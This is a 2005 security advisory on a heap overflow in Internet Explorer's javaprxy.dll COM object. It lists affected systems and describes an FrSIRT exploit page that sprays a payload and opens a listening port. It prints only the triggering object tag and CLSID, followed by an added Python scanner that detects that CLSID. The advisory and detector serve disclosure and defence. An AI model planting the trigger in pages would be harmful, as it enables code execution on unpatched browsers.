Microsoft Internet Explorer Javaprxy.DLL COM Object Heap Overflow Vulnerability
Source: www.fsou.com Date: 2005-10-21
Published: 2005-07-01
Updated: 2005-07-02
Severity: High
Threat level: control of the application system
Error type: boundary check error
Exploitation method: client mode
BUGTRAQ ID: 14087

Affected systems
Microsoft Internet Explorer 6.0 SP2 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6a + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition 64-bit + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition 64-bit + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows XP Home + Microsoft Windows XP Professional Microsoft Internet Explorer 5.5 SP2 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft 
Windows 95 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.5 SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 
Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.5 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server 
SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 + Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft 
Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.0.1 SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 
Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.0.1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 
- Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a

Details
Microsoft Internet Explorer contains a heap overflow vulnerability. When a malicious web page instantiates the 'javaprxy.dll' COM object, a heap overflow may occur; successful exploitation allows arbitrary code to be executed in the context of the client.
Test code
Note: this exploit code is a ready-to-use HTM page generated by the Perl script published by FrSIRT. It is saved as a web page; if it executes successfully when opened, it listens on port 28876.

After a script that fills memory with copies of its payload, the page instantiates the COM object:
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>

Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT <http://www.frsirt.com>
Solution - http://www.frsirt.com/english/advisories/2005/0935
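A content-inspection check for the trigger described above, as an added example that is not part of the original advisory or of FrSIRT's code: it flags HTML that references the javaprxy.dll CLSID from the test page, whether in an <object> tag or as a plain string. The function names, the finding labels and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID from the <object> tag in the test page above.
JAVAPRXY_CLSID = "03D9F3F2-B0E3-11D2-B081-006008039BF0"

def normalize_classid(value):
    """Return the bare upper-case GUID of a classid attribute value, or None."""
    m = re.fullmatch(r"\s*clsid:\s*\{?([0-9a-f-]{36})\}?\s*", value or "", re.I)
    return m.group(1).upper() if m else None

class ObjectTagScanner(HTMLParser):
    """Records the line of every <object> tag whose classid is the target."""
    def __init__(self, clsid):
        super().__init__()
        self.clsid = clsid.upper()
        self.lines = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases names and decodes entities in values,
        # so "ClassID" and "CLSID&#58;..." are both seen here.
        if tag == "object" and any(
            name == "classid" and normalize_classid(value) == self.clsid
            for name, value in attrs
        ):
            self.lines.append(self.getpos()[0])

def scan_html(text, clsid=JAVAPRXY_CLSID):
    """Return sorted (line, kind) findings for one HTML document."""
    scanner = ObjectTagScanner(clsid)
    scanner.feed(text)
    scanner.close()
    tagged = set(scanner.lines)
    findings = {(line, "object-tag") for line in tagged}
    # Fallback: the GUID as a plain string, e.g. markup built inside <script>.
    for number, line in enumerate(text.splitlines(), start=1):
        if clsid.lower() in line.lower() and number not in tagged:
            findings.add((number, "raw-guid"))
    return sorted(findings)

# Constructed sample page (not real traffic); line 5 uses a made-up CLSID.
SAMPLE = """<html><body>
<p>benign page text</p>
<OBJECT ClassID='clsid:{03d9f3f2-b0e3-11d2-b081-006008039bf0}'></OBJECT>
<object classid="CLSID&#58;03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
<object classid="clsid:11111111-2222-3333-4444-555555555555"></object>
<script>document.write('<obj' + 'ect classid="clsid:03D9F3F2-B0E3-11D2-B081-006008039BF0">');</script>
</body></html>"""

if __name__ == "__main__":
    for line, kind in scan_html(SAMPLE):
        print(f"line {line}: {kind}")
```

The raw-string fallback only catches the GUID when it appears contiguously in the source; markup that assembles the GUID itself at run time is outside what a static scan of this kind can see.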
Solution
The vendor has released an advisory (Microsoft Security Advisory (903144)); this advisory contains workarounds that may be applied to prevent exploitation of this issue. Customers are highly advised to peruse the referenced advisory for further information.
Related information
http://www.securityfocus.net/bid/14087/